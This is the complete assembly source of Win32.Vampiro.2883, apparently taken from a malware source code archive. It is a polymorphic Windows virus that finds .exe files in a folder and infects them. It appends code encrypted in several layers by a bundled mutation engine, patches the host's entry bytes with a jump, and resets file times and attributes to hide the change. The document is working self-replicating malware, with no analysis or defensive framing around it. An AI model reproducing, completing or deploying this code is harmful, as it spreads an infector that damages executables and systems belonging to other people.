MalwareSourceCode/Win32/Infector/Win32.Vampiro.2883.asm

952 lines
23 KiB
NASM
Raw Permalink Normal View History

2020-10-11 03:09:34 +00:00
; Win32.Vampiro.2883
;
; - poly, used LME32 v.1.0
; - many layers, max - 11
; - used SEH
; - dont change entry point
;
; (c) LordDark [MATRiX]
.386
include 1.inc
locals __
.model flat
.code
db ?
.data
start proc
call get_delta
call set_seh
mov esp, [esp.8]
jmp exit
set_seh:
sti
sub eax, eax
push 4 ptr fs:[eax]
mov 4 ptr fs:[eax], esp
mov eax, [esp+11*4]
sub ax, ax
__5:
cmp 2 ptr [eax], 'ZM'
jz __4
sub eax, 10000h
jmp __5
__4:
mov 4 ptr [ebp.k32], eax
call import
push 0
call [ebp.GetModuleHandleA]
add [ebp.host32_1], eax
call restore
sub esp, 16
push esp
call [ebp.GetSystemTime]
mov eax, esp
push eax eax esp eax
call [ebp.SystemTimeToFileTime]
mov eax, [esp]
xor eax, [esp.4]
add esp, 24
mov [ebp.seed], eax
lea eax, [ebp.rnd]
mov 4 ptr [ebp.lme32_random], eax
push _vl 0
call [ebp.GlobalAlloc]
push eax
xchg eax, edi
lea esi, [ebp.start]
mov ecx, vl
lea eax, [ebp+__exit]
push eax
lea eax, [edi+__next-start]
push eax
rep movsb
ret
__next:
call get_delta
sub esp, size find_str
mov esi, esp
sub edi, edi
push esi ;;; hehe
lea eax, [ebp+mask]
push eax
call [ebp+FindFirstFileA]
cmp eax, -1
jz __1
__2:
push eax
push edi
push esi
lea edx, [esi.cFileName]
call infect_it
pop esi
push esi
push 4 ptr [esp.8]
call [ebp+FindNextFileA]
pop edi
inc edi
cmp edi, 50
ja __3
test eax, eax
pop eax
jnz __2
push eax
__3:
call [ebp+FindClose]
__1:
add esp, size find_str
ret
__exit:
call [ebp.GlobalFree]
exit:
pop 4 ptr fs:[0]
pop eax
popad
popf
db 68h
host32_1 dd offset host32-400000h
ret
endp
mask db '*.exe',0
restore proc
push 0 5
call __1
saved:
dd 90909090h
db 90h
__1:
mov eax, [ebp.host32_1]
push eax
call [ebp.GetCurrentProcess]
push eax
call [ebp.WriteProcessMemory]
ret
endp
Vampiro db 'Vampiro',0
import_table:
import_beg kernel32
import_nam _lopen
import_nam ReadFile
import_nam WriteFile
import_nam CloseHandle
import_nam SetFileAttributesA
import_nam GetFileAttributesA
import_nam GetFileTime
import_nam SetFileTime
import_nam SetEndOfFile
import_nam GetFileSize
import_nam SetFilePointer
import_nam SystemTimeToFileTime
import_nam GetSystemTime
import_nam WriteProcessMemory
import_nam GetCurrentProcess
import_nam GlobalAlloc
import_nam GlobalFree
import_nam FindClose
import_nam FindFirstFileA
import_nam FindNextFileA
import_end
import_end
get_delta proc
call $+5
delta:
cld
pop ebp
sub ebp, offset delta
ret
endp
include import.inc
infect_it proc
call __set_seh
mov esp, [esp.8]
jmp __1
__set_seh:
cld
sub eax, eax
push 4 ptr fs:[eax]
mov 4 ptr fs:[eax], esp
call infect
__1:
pop 4 ptr fs:[0]
pop eax
ret
endp
infect proc
; edx - name
call fattrg
cmp eax, -1
jnz __1
__2:
ret
__1: sub ecx, ecx
xchg eax, ecx
call fattrs
test eax, eax
jz __2
push 2
pop eax
call open
cmp eax, -1
xchg eax, ebx
jz __2
push ecx
sub esp, 3*8
mov esi, esp
push edx
call gettime
lea edx, [ebp.buffer]
push 3Ch+4
pop ecx
call read
jc __close
cmp 2 ptr [edx], 'ZM'
jnz __close
cmp 2 ptr [edx.18h], 40h
jb __close
push edx
movzx edx, 2 ptr [edx.3Ch]
mov [ebp.word3C], edx
call seek
pop edx
mov ecx, 0F8h + (28h*8)
call read
jc __close
cmp 2 ptr [edx], 'EP'
jnz __close
; dll ? if i process dll then skip
; this test
test 2 ptr [edx.16h], 2000h
jnz __close
; can run ?
test 2 ptr [edx.16h], 0002h
jz __close
; intel x86 processor ?
mov al, [edx.4]
and al, 11110000b
cmp al, 40h
jnz __close
; 2..8 sections ?
cmp 2 ptr [edx.06h], 8
ja __close
cmp 2 ptr [edx.06h], 2
jb __close
; it's already ?
mov al, 2Eh
cmp 1 ptr [edx.44h], al
jz __close
mov 1 ptr [edx.44h], al
; save EIP
mov eax, [edx.28h]
mov [ebp.host32_1], eax
mov eax, 1000h
cmp [edx.38h], eax
ja __close
cmp [edx.3Ch], eax
ja __close
lea edi, [ebp.buff]
mov ecx, (len_buff)/4
sub eax, eax
call rnd
__loop:
sub al, cl
rol eax, 1
stosd
loop __loop
; ecx - null
mov 4 ptr [edx.58h], ecx
call process_it
__close:
pop edx
mov esi, esp
call settime
add esp, 3*8
call close
pop eax
call fattrs
ret
endp
process_it proc
movzx eax, 2 ptr [edx.14h]
cmp al, 0E0h
jnz __1
lea edi, [eax+18h+edx]
movzx ecx, 2 ptr [edx.6]
__loop:
; check file
mov esi, [edx.28h]
cmp 4 ptr [edi.0Ch], esi
ja __4
push eax
mov eax, 4 ptr [edi.0Ch]
add eax, 4 ptr [edi.10h]
cmp esi, eax
pop eax
jb __5
__4:
add edi, 28h
loop __loop
jmp __1
__5: test 1 ptr [edi.27h], 80h
jnz __1
; read from IP some bytes
; for UEP
lea esi, [eax+18h+edx]
push edx
mov eax, [edx.028h]
sub eax, [edi.0Ch]
add eax, [edi.14h]
mov 4 ptr [ebp.forUEP], eax
xchg eax, edx
call seek
lea edx, [ebp.UEP]
mov ecx, size_UEP
call read
pop edx
jc __1
movzx eax, 2 ptr [edx.6]
dec eax
imul eax, eax, 28h
add esi, eax
mov edi, [esi.14h]
add edi, [esi.10h]
call fsize
cmp eax, edi
jz __2
push edx
mov edx, edi
call seek
push eax
mov edx, esp
push 4
pop ecx
call read
pop eax
cmp eax, 1
jz __3
call fsize
sub eax, edi
cmp eax, 100h ; 256 bytes only
; if yes then skip it ;)
jb __3
pop eax
jmp __1
__3:
mov edx, edi
call seek
call truncate
pop edx
__2: mov [ebp.flen], edi
or 1 ptr [esi.24h+3], 0C0h
lea edi, [ebp.UEP]
mov eax, [edi]
mov 4 ptr [ebp.saved], eax
mov al, [edi.4]
mov 1 ptr [ebp.saved+4], al
mov al, 0E9h
stosb
mov eax, 4 ptr [esi.10h]
add eax, 4 ptr [esi.0Ch]
sub eax, 4 ptr [ebp.host32_1]
sub eax, 5
stosd
; max 11 layers!
push esi
; gen 1 layer
lea esi, [ebp.start]
lea edi, [ebp.buff]
mov ecx, vl
call lme32
; max 10 layer
; 2..10
push eax
push 5
pop eax
call rnd
inc eax
shl eax, 1
xchg eax, ecx
; gen next layers
pop eax
__8:
push ecx
; 1 layer <-|
; 2 layer ---|
mov esi, edi
add edi, eax
xchg eax, ecx
call lme32
xchg esi, edi
xchg eax, ecx
call lme32
; edi - 1 layer
; esi - 2 layer
; eax - length
pop ecx
loop __8
pop esi
dec edi
dec edi
mov 2 ptr [edi], 609Ch
add eax, 8
xchg eax, edi
push eax
; edi - virus length
mov eax, edi
add eax, [edx.3Ch]
add eax, [esi.10h]
mov ecx, [edx.3Ch]
neg ecx
and eax, ecx
mov [esi.10h], eax
cmp [esi.08h], eax
ja __x
mov [esi.08h], eax
__x: mov eax, [esi.08h]
add eax, [esi.0Ch]
add eax, [edx.38h]
mov ecx, [edx.38h]
neg ecx
and eax, ecx
mov [edx.50h], eax
call fsize
xchg eax, edx
call seek
pop edx
push -1
pop eax
call rnd
db 0BFh
flen dd 0
mov ecx, [esi.10h]
add ecx, [esi.14h]
sub ecx, edi
mov 1 ptr [ecx+edx-6], al
xor al, 'V'
mov 1 ptr [ecx+edx-6+1], al
mov 4 ptr [ecx+edx-6+2], edi
call write
mov edx, [ebp.forUEP]
call seek
lea edx, [ebp.UEP]
mov ecx, size_UEP
call write
mov edx, [ebp.word3C]
call seek
lea edx, [ebp.buffer]
mov ecx, 0F8h + (28h*8)
call write
__1:
ret
endp
rnd proc
push ebp
push edx ecx eax
call $+5
$delta:
pop ebp
sub ebp, offset $delta
db 0B8h
seed dd ?
imul eax, eax, 8088405h
inc eax
mov [ebp.seed], eax
pop ecx
jecxz __1
xor edx, edx
div ecx
xchg eax, edx
__1:
pop ecx edx
pop ebp
ret
endp
include fio.inc
include lme32.inc
vl equ ($-start)
buff:
db (11*2000)+vl*2 dup (?)
db 1000h dup (?)
len_buff equ $-buff
buffer db 0F8h + (28h*8) dup (?)
word3C dd ?
size_UEP equ 5
UEP db size_UEP dup (?)
forUEP dd ?
_vl equ ($-start)
.code
host32:
db 0E9h
dd 0
push 0
zcall ExitProcess
db 'Win32.Vampiro.'
db vl / 1000 mod 10 + '0'
db vl / 100 mod 10 + '0'
db vl / 10 mod 10 + '0'
db vl / 1 mod 10 + '0'
real_start:
pushf
pusha
jmp start
end real_start
--[1.inc]--------------------------------------------------------------------->8
zcall macro api
extrn api: proc
call api
endm
CRC32_init equ 0EDB88320h
CRC32_num equ 0FFFFFFFFh
CRC32_eax macro string
db 0B8h
CRC32 string
endm
CRC32 macro string
crcReg = CRC32_num
irpc _x,<string>
ctrlByte = '&_x&' xor (crcReg and 0FFh)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
import_beg macro kernel
db '&kernel&',0
endm
import_nam macro name
CRC32 &name&
local b
b=0
irpc a,<name>
IF b EQ 0
db '&a&'
ENDIF
b=b+1
endm
&name& dd 0
endm
import_end macro
dd 0
endm
MAX_PATH = 260
find_str struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db MAX_PATH dup (?)
cAlternateFileName db 14 dup (?)
ends
unicode macro text
irpc _x,<text>
db '&_x&',0
endm
db 0,0
endm
hook macro name
local b
b=0
irpc a,<name>
IF b EQ 0
db '&a&'
ENDIF
b=b+1
endm
CRC32 &name&
dw offset h&name&-start
dw offset _&name&-start
endm
dtime struc
wYear dw ?
wMonth dw ?
wDayOfWeek dw ?
wDay dw ?
wHour dw ?
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
ends
--[import.inc]---------------------------------------------------------------->8
get_proc proc
push ebp
; in:
; eax - CRC32
; ebx - DLL offset
; dl - first char
; out:
; eax - API address
; [ecx+ebx] - offset API address in table
; ebx - offset DLL
mov edi, [ebx+3Ch]
mov edi, [edi+78h+ebx]
mov ecx, [edi+18h+ebx]
mov esi, [edi+20h+ebx]
__1:
mov ebp, [esi+ebx]
add ebp, ebx
cmp 1 ptr [ebp], dl
jnz __2
push ebx ecx
; use ebx, ecx
; ebp - offset to name'z
xor ebx, ebx
dec ebx
__5:
xor bl, 1 ptr [ebp]
inc ebp
mov cl, 7
__3:
shr ebx, 1
jnc __4
xor ebx, CRC32_init
__4:
dec cl
jns __3
cmp 1 ptr [ebp], 0
jnz __5
cmp eax, ebx
pop ecx ebx
jz __6
__2:
add esi, 4
loop __1
__6:
sub ecx, [edi+18h+ebx]
neg ecx
add ecx, ecx
add ecx, [edi+24h+ebx]
add ecx, ebx
movzx ecx, 2 ptr [ecx]
shl ecx, 2
add ecx, [edi+1Ch+ebx]
mov eax, [ecx+ebx]
add eax, ebx
pop ebp
ret
endp
import proc
mov ebx, [ebp.k32]
CRC32_eax GetModuleHandleA
mov dl, 'G'
call get_proc
mov [ebp.GetModuleHandleA], eax
CRC32_eax LoadLibraryA
mov dl, 'L'
call get_proc
mov [ebp.LoadLibraryA], eax
lea esi, [ebp.import_table]
__1:
push esi
call [ebp.GetModuleHandleA]
test eax, eax
jnz __2
; if library not load ...
push esi
call [ebp.LoadLibraryA]
__2:
xchg eax, ebx
__3:
lodsb
test al, al
jnz __3
__4:
lodsd
test eax, eax
jz __5
mov dl, [esi]
inc esi
push esi
call get_proc
pop edi
stosd
mov esi, edi
jmp __4
__5:
cmp [esi], eax
jnz __1
ret
endp
GetModuleHandleA dd 0
LoadLibraryA dd 0
k32 dd 0BFF70000h
--[fio.inc]------------------------------------------------------------------->8
truncate proc
pushad
push ebx
call [ebp.SetEndOfFile]
jmp n_chk
endp
fsize proc
pushad
push 0 ebx
call [ebp.GetFileSize]
jmp n_chk
endp
gettime proc
pushad
; esi - addres struc
;
; CONST FILETIME * lpftLastWrite // time the file was last written
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
; CONST FILETIME * lpftCreation, // time the file was created
;
; filetime struc
; dwLowDateTime dd ?
; dwHighDateTime dd ?
; ends
push esi
lodsd
lodsd
push esi
lodsd
lodsd
push esi ebx
call [ebp.GetFileTime]
jmp n_chk
endp
settime proc
pushad
; esi - addres struc
;
; CONST FILETIME * lpftLastWrite // time the file was last written
; CONST FILETIME * lpftLastAccess, // time the file was last accessed
; CONST FILETIME * lpftCreation, // time the file was created
;
; filetime struc
; dwLowDateTime dd ?
; dwHighDateTime dd ?
; ends
push esi
lodsd
lodsd
push esi
lodsd
lodsd
push esi ebx
call [ebp.SetFileTime]
jmp n_chk
endp
fattrs proc
pushad
push eax edx
call [ebp.SetFileAttributesA]
jmp n_chk
endp
fattrg proc
pushad
push edx
call [ebp.GetFileAttributesA]
jmp n_chk
endp
open proc
pushad
; eax - mode
; edx - name
;
; OF_READ Opens the file for reading only.
; OF_READWRITE Opens the file for reading and writing.
; OF_WRITE Opens the file for writing only.
push eax edx
call [ebp._lopen]
n_chk:
mov [esp.1Ch], eax
popad
ret
endp
close proc
pushad
push ebx
call [ebp.CloseHandle]
popad
ret
endp
write proc
pushad
push eax
mov eax, esp
push 0
push eax
push ecx edx ebx
call [ebp.WriteFile]
jmp n_check
endp
read proc
; ecx - length
; ebx - handle
; edx - buffer
pushad
push eax
mov eax, esp
push 0
push eax
push ecx edx ebx
call [ebp.ReadFile]
n_check:
pop eax
mov [esp.1Ch], eax
popad
cmp eax, ecx
jz __1
stc
__1:
ret
endp
seek proc
pushad
push 0 0 edx ebx
call [ebp.SetFilePointer]
jmp n_chk
endp
--[lme32.inc]----------------------------------------------------------------->8
; LME32 v.1.0
;
; ECX - length
; EDI - buffer
; ESI - source
;
; must be in r/w section
lme32:
db 060h,0E8h,00Fh,000h,000h,000h
lme32_random dd 0
db 05Bh,04Ch,04Dh,045h
db 033h,032h,02Eh,031h,031h,037h,033h,05Dh,081h,0EDh,006h,020h,040h,000h
db 0C1h,0E9h,002h,041h,089h,08Dh,0D3h,021h,040h,000h,089h,0BDh,0E5h,021h
db 040h,000h,089h,0B5h,0CEh,021h,040h,000h,0C7h,085h,025h,022h,040h,000h
db 0EFh,000h,000h,000h,08Dh,0B5h,030h,022h,040h,000h,0E8h,00Fh,003h,000h
db 000h,0B0h,003h,0FFh,0D6h,040h,091h,051h,0E8h,070h,002h,000h,000h,059h
db 0E2h,0F7h,0B0h,0E8h,0AAh,02Bh,0C0h,0ABh,08Bh,0C7h,02Bh,085h,0E5h,021h
db 040h,000h,089h,085h,0BCh,021h,040h,000h,0E8h,0E7h,002h,000h,000h,0E8h
db 0ABh,001h,000h,000h,088h,085h,046h,021h,040h,000h,050h,00Fh,0B6h,0C0h
db 00Fh,0B3h,085h,025h,022h,040h,000h,058h,00Ch,058h,0AAh,0E8h,091h,001h
db 000h,000h,050h,00Fh,0B6h,0C0h,00Fh,0B3h,085h,025h,022h,040h,000h,058h
db 088h,085h,077h,021h,040h,000h,08Bh,095h,0D3h,021h,040h,000h,0E8h,053h
db 001h,000h,000h,0E8h,0A6h,002h,000h,000h,0E8h,0B1h,002h,000h,000h,06Ah
db 0FFh,058h,0FFh,095h,006h,020h,040h,000h,089h,085h,0E1h,020h,040h,000h
db 0B0h,081h,0AAh,0E8h,04Ah,001h,000h,000h,0B0h,0E8h,074h,002h,0B0h,0C0h
db 09Ch,00Ah,085h,046h,021h,040h,000h,0AAh,089h,0BDh,082h,021h,040h,000h
db 0B8h,064h,022h,002h,002h,0ABh,09Dh,074h,006h,0F7h,09Dh,0E1h,020h,040h
db 000h,0E8h,062h,002h,000h,000h,0B0h,003h,0FFh,0D6h,003h,0C0h,08Bh,09Ch
db 005h,0F5h,021h,040h,000h,066h,089h,09Dh,0DDh,021h,040h,000h,08Bh,084h
db 005h,0EFh,021h,040h,000h,00Ah,0A5h,046h,021h,040h,000h,066h,0ABh,089h
db 0BDh,0C7h,021h,040h,000h,0ABh,06Ah,0FFh,058h,0FFh,095h,006h,020h,040h
db 000h,089h,085h,0D8h,021h,040h,000h,0ABh,0E8h,023h,002h,000h,000h,0B0h
db 083h,0AAh,0E8h,0DBh,000h,000h,000h,066h,0B8h,0C0h,004h,074h,004h,066h
db 0B8h,0E8h,0FCh,00Ch,003h,066h,0ABh,0E8h,008h,002h,000h,000h,0B0h,048h
db 00Ah,085h,077h,021h,040h,000h,0AAh,0E8h,0FAh,001h,000h,000h,0E8h,005h
db 002h,000h,000h,0B0h,003h,0FFh,0D6h,08Dh,09Dh,0FBh,021h,040h,000h,0D7h
db 0AAh,08Ah,085h,077h,021h,040h,000h,0C0h,0E0h,003h,00Ch,000h,00Ch,0C0h
db 0AAh,066h,0B8h,00Fh,085h,066h,0ABh,0B8h,0E0h,098h,040h,000h,02Bh,0C7h
db 0ABh,050h,00Fh,0B6h,085h,046h,021h,040h,000h,00Fh,0ABh,085h,025h,022h
db 040h,000h,058h,050h,00Fh,0B6h,085h,077h,021h,040h,000h,00Fh,0ABh,085h
db 025h,022h,040h,000h,058h,0E8h,0A8h,001h,000h,000h,0E8h,0B3h,001h,000h
db 000h,08Bh,0C7h,02Bh,085h,0E5h,021h,040h,000h,02Dh,030h,002h,000h,000h
db 003h,085h,0E1h,020h,040h,000h,0BAh,0F8h,098h,040h,000h,089h,002h,0BEh
db 02Bh,082h,040h,000h,0B9h,015h,005h,000h,000h,0BAh,084h,056h,0BAh,05Ah
db 0ADh,003h,0C2h,0ABh,0E2h,0FAh,08Bh,0C7h,02Dh,07Dh,096h,040h,000h,089h
db 044h,024h,01Ch,061h,0C3h,081h,0B0h,081h,080h,081h,0A8h,033h,0C2h,02Bh
db 0C2h,003h,0C2h,085h,023h,00Bh,0E8h,013h,000h,000h,000h,074h,006h,00Ch
db 0B8h,0AAh,092h,0ABh,0C3h,050h,0B0h,068h,0AAh,092h,0ABh,058h,00Ch,058h
db 0AAh,0C3h,050h,0B0h,002h,0FFh,0D6h,085h,0C0h,058h,0C3h,053h,0B0h,008h
db 0FFh,0D6h,0BBh,0EFh,000h,000h,000h,00Fh,0A3h,0C3h,073h,0F2h,05Bh,0C3h
db 00Fh,0B6h,0C0h,0FFh,0A5h,006h,020h,040h,000h,080h,0CCh,0C0h,0C0h,0E0h
db 003h,00Ah,0C4h,0AAh,0C3h,008h,047h,0FFh,0C3h,00Ch,0C0h,0AAh,0B0h,008h
db 0FFh,0D6h,03Ch,006h,074h,0F8h,0C0h,0E0h,003h,008h,047h,0FFh,0C3h,00Ch
db 0C0h,0C0h,0E4h,003h,00Ah,0C4h,0AAh,0B0h,0FFh,0FFh,0D6h,0AAh,0C3h,08Bh
db 039h,002h,07Fh,0B7h,039h,002h,040h,0BFh,039h,002h,040h,087h,039h,002h
db 0BFh,003h,039h,002h,07Fh,013h,039h,002h,07Fh,023h,039h,002h,07Fh,00Bh
db 039h,002h,07Fh,02Bh,039h,002h,07Fh,01Bh,039h,002h,07Fh,033h,039h,002h
db 07Fh,040h,043h,002h,07Fh,048h,043h,002h,07Fh,039h,039h,002h,03Fh,085h
db 039h,002h,03Fh,0D1h,047h,002h,07Fh,0D3h,047h,002h,07Fh,0A4h,059h,002h
db 040h,0ACh,059h,002h,040h,0C8h,043h,002h,040h,0ABh,039h,002h,080h,0B3h
db 039h,002h,080h,0BBh,039h,002h,080h,0E8h,09Eh,000h,000h,000h,0B8h,064h
db 067h,0FFh,036h,0ABh,02Bh,0C0h,066h,0ABh,0E8h,07Fh,000h,000h,000h,0E8h
db 08Ah,000h,000h,000h,0B0h,0E8h,0AAh,0ABh,057h,0E8h,070h,000h,000h,000h
db 0E8h,07Bh,000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h
db 0ABh,0E8h,05Ch,000h,000h,000h,0E8h,067h,000h,000h,000h,0B0h,0E9h,0AAh
db 0ABh,08Bh,0D7h,0E8h,04Ch,000h,000h,000h,0E8h,057h,000h,000h,000h,058h
db 08Bh,0DFh,02Bh,0D8h,089h,058h,0FCh,0E8h,03Ah,000h,000h,000h,0E8h,045h
db 000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h,0ABh,0E8h
db 026h,000h,000h,000h,0E8h,031h,000h,000h,000h,0B8h,064h,067h,0FFh,026h
db 0ABh,02Bh,0C0h,066h,0ABh,0E8h,012h,000h,000h,000h,0B0h,0FFh,0FFh,0D6h
db 0AAh,0E8h,008h,000h,000h,000h,08Bh,0C7h,02Bh,0C2h,089h,042h,0FCh,0C3h
db 0B0h,005h,0FFh,0D6h,040h,091h,051h,0E8h,013h,000h,000h,000h,059h,0E2h
db 0F7h,0C3h,080h,0BDh,07Eh,023h,040h,000h,001h,075h,005h,0E8h,009h,000h
db 000h,000h,0C3h,0B0h,004h,0FFh,0D6h,022h,0C0h,075h,049h,0B0h,000h,084h
db 0C0h,075h,012h,0FEh,085h,07Eh,023h,040h,000h,0B0h,0E8h,0AAh,089h,0BDh
db 09Eh,023h,040h,000h,0ABh,0EBh,031h,0E8h,085h,0FEh,0FFh,0FFh,00Ch,0B8h
db 0AAh,0B8h,034h,099h,040h,000h,08Bh,0DFh,02Bh,0D8h,057h,097h,093h,083h
db 0E8h,004h,0ABh,05Fh,0B0h,0C3h,0AAh,06Ah,0FFh,058h,0FFh,095h,006h,020h
db 040h,000h,066h,0ABh,0C1h,0E8h,010h,0AAh,0FEh,08Dh,07Eh,023h,040h,000h
db 0B0h,01Ah,0FFh,0D6h,03Ch,019h,075h,016h,0E8h,009h,000h,000h,000h,0F8h
db 0FCh,0FAh,0F5h,0FBh,090h,0F9h,0FDh,09Eh,05Bh,0B0h,009h,0FFh,0D6h,0D7h
db 0AAh,0C3h,03Ch,018h,075h,017h,052h,06Ah,0FFh,058h,0FFh,095h,006h,020h
db 040h,000h,092h,0E8h,027h,0FEh,0FFh,0FFh,0E8h,001h,0FEh,0FFh,0FFh,05Ah
db 0C3h,03Ch,017h,075h,01Dh,0B0h,08Dh,0AAh,0E8h,014h,0FEh,0FFh,0FFh,03Ch
db 005h,074h,0F7h,0C0h,0E0h,003h,00Ch,005h,0AAh,06Ah,0FFh,058h,0FFh,095h
db 006h,020h,040h,000h,0ABh,0C3h,08Dh,09Ch,085h,067h,022h,040h,000h,0E8h
db 0EAh,0FDh,0FFh,0FFh,074h,003h,0B0h,066h,0AAh,0F6h,043h,003h,03Fh,075h
db 003h,0B0h,00Fh,0AAh,08Ah,003h,0AAh,08Ah,043h,003h,024h,0C0h,03Ch,000h
db 075h,016h,0B0h,008h,0FFh,095h,006h,020h,040h,000h,08Ah,0C8h,0B0h,008h
db 0FFh,095h,006h,020h,040h,000h,08Ah,0E1h,0EBh,02Bh,03Ch,040h,075h,015h
db 0E8h,0BAh,0FDh,0FFh,0FFh,08Ah,0C8h,0B0h,008h,0FFh,095h,006h,020h,040h
db 000h,08Ah,0E0h,08Ah,0C1h,0EBh,012h,0E8h,0A5h,0FDh,0FFh,0FFh,08Ah,0C8h
db 0E8h,09Eh,0FDh,0FFh,0FFh,03Ah,0C1h,074h,0F0h,08Ah,0E1h,00Fh,0B7h,05Bh
db 001h,08Dh,09Ch,01Dh,000h,020h,040h,000h,0FFh,0D3h,0C3h